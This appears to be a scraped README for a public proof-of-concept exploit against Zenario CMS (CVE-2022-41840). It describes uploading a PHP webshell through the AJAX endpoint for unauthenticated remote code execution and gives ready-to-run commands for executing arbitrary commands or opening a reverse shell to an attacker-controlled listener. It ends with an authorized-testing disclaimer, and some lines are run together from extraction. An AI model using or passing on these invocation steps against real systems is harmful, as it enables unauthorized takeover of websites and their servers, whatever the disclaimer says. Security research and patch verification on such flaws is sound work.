
This is the PoC exploit for CVE-2022-41840, running Zenario
An unauthenticated remote code execution (RCE) vulnerability affecting Zenario CMS version 9.3 and earlier. The exploit leverages a file upload vulnerability in the AJAX endpoint to upload a PHP webshell and achieve code execution.
/zenario/ajax.phppython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requests libraryInstall dependencies:
pip install requests
For educational and authorized security testing purposes only.
This tool is provided for security researchers and penetration testers to test systems they own or have explicit authorization to test. Unauthorized access to computer systems is illegal and strictly prohibited.
The maintainers assume no liability for any misuse or damage caused by this tool.
This code is provided for educational purposes.